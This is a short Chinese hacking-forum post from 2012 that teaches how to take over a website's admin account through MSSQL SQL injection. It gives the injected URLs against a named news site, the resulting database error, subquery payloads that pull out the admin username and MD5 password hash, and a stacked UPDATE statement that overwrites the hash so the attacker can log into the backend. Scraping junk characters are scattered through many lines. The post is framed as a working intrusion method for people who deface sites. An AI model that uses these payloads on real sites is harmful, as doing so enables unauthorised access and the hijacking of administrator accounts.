经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
* R+ ?! g$ }) ^' C7 J可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
4 A9 _9 L& N' u; H1 P' ~' T5 i测试如下:
7 ~( q4 i9 @6 X1 mhttp://www.tmdsb.com/news.asp?id=121
' h, ]. S. u7 w6 W* ]在地址后输入单引号,显示- g8 r: j' z0 M4 W& _, y L
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
' d8 n4 Q& M+ d; K# ^8 |; O% o; D字符串 ’’’ 之前有未闭合的引号1 o* @5 a8 n9 s7 k: E6 w+ I
/news/tmdws.asp,行63; E- m Y( {. K! d, b) N* b4 i
说明没有过滤单引号且数据库是MSSQL.) K% `9 d$ ~8 M2 }) U R
and 1=1正常。and 1=2出错。肯定存在注入
3 ~8 [% } L$ ~+ \& ^$ A接着输入2 _: R! L) r X/ e
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)# G9 F3 I8 V# G
得到帐号为:admin$ H$ @* l+ R8 e7 m" ^5 S
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)) f! s- a" N! L2 ]
得到密码为:a4716077c2ba075c: b* C$ }0 V4 s% g0 n* T4 Z! y
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
/ @0 G2 ^* k1 [命令如下 :
7 c4 f: H2 E; F5 _- z;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–5 q8 X! }7 x& k/ L5 ?, o4 b1 A
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41